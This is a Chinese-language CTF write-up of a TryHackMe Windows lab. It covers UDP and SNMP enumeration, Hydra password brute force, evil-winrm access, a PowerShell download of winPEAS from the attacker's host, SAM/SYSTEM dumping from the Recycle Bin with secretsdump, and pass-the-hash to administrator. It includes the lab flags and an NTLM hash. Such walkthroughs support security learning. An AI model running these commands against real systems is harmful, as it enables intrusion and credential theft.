端口扫描

扫出来好多端口。然而web服务扫不出来什么端口，访问也只有一张图片而已。SMB也枚举不出来东西，myql和远程桌面也都没有信息可以连接。完全没有任何头绪啊（悲

看WP，扫描了他的UDP端口

sudo nmap 10.10.140.97 -sUV --top-ports 10 -Pn

而且还要加上–top-ports 10扫描是个最常用的端口，否则还扫不出来233。

snmp

发现了个snmp，然后可以用onesixtyone这个工具对他进枚举。snmp是一个对网络设备管理的服务，采取的是UDP协议。

onesixtyone 10.10.140.97 -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt

发现了一个叫做openview的社区名

snmp-check 10.10.88.208 -c openview

然后用snmp-check这个工具枚举一下这个社区名，发现了一个非默认的用户名

之前我们发现5985端口开启，是一个winrm服务，用http协议进行远程管理的服务。

hydra -l jareth -P /usr/share/wordlists/rockyou.txt 10.10.88.208 -t 4 rdp

我们先对3389RDP服务进行指定用户名爆破密码

爆出来是sarah,貌似也是每次开启靶机都不一样

但是3389rdp连接提示错误，用evil-winrm来进行连接

evil-winrm -i 10.10.88.208 -u jareth -p sarah

成功得到了shell

在用户的桌面找到了user.txt

THM{Y2I0NDJjODY2NTc2YmI2Y2U4M2IwZTBl}

没什么思路诶，传个winpeas吧

kali开启一个python服务器

powershell -c wget "http://10.14.52.15/winPEAS.bat" -outfile "winPEAS.bat"

运行到一半发现炸了。看大佬们的WP貌似是开了杀毒软件。。。。

没办法了，WP在回收站里面发现了SAM和SYSTEM的备份文件

cd C:\$Recycle.Bin

提示目录不存在，可以根据当前用户的SID来进入回收站

whoami /user

得到SID

cd 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001'

找到文件

但是在回收站中不能直接下载，选择先把两个文件移出

move .\sam.bak c:\Users\jareth\Desktop

move .\system.bak c:\Users\jareth\Desktop

download sam.bak

download system.bak

应该是evil-winrm这个工具特有的命令吧，就算不用evil-winrm的话，可以用Python脚本开启一个SMB共享文件夹来传输文件

接下来我们需要一个叫做impacket的python工具包，kali自带。貌似是渗透测试中比较常用的工具包。

python3 secretsdump.py -sam '/home/mikannse/桌面/sam.bak' -system '/home/mikannse/桌面/system.bak' LOCAL

得到admin的密码哈希aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a

然后我们再用这个工具包中的psexec.py,用evil-winrm也行

evil-winrm -i 10.10.88.208 -u administrator -H 6bc99ede9edcfecf9662fb0c0ddcfa7a

hash取得是分号后面那段，前面那段是管理用户还有有域之类的信息，后面那段才是加密后的哈希

在管理员的桌面找到admin.txt

THM{YWFjZTM1MjFiZmRiODgyY2UwYzZlZWM2}

还算难的靶机，但是难点和以往打的靶机不太一样。主要是没思路，见识太浅薄了。第一次碰到UDP端口的利用，所以扫端口不要只扫TCP！稍微了解了snmp服务。久违的win靶机，复习了一下win提权的知识，难点主要也是思路的问题。找到文件后也没什么难点了，无非是跑工具罢了（

也许有必要去全面学一下powershell（？